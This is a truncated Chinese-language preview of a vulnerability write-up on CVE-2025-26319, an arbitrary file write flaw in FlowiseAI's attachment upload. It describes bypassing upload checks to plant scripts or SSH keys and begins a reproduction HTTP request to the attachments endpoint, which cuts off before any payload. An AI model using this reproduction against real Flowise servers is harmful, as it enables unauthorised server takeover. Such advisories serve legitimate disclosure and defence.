FlowiseAI 任意文件写入漏洞 CVE-2025–26319

文章预览

漏洞简介 Flowise是一款与LangChain兼容的开源低代码工具，使普通用户和开发人员都能通过可视化连线方式创建LLM工作流和AI应用。然而该平台存在严重的文件上传漏洞——尽管Flowise实施了上传校验机制，攻击者仍可通过特殊编码绕过限制，实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者能够上传恶意文件、脚本或SSH密钥，从而获取对托管服务器的远程控制权，对使用该平台构建AI代理的组织构成重大安全威胁。 漏洞复现 安装环境后构造上传的数据包 POST  / api / v1 / attachments / test / test HTTP / 1.1 Host :  localhost : 3000 Accept :  application / json ,  text / plain ,   */* x - request - from :  internal User - Agent :   Mozilla / 5.0   ( Windows  NT  10.0 ;   Win64 ;  x64 )   AppleWebKit / 537.36   ( KHTML ,  like  Gecko )   Chrome / 85.0 . 4183.83   Safari / 537.36 Sec - Fetch - Site :  same - origi ………………………………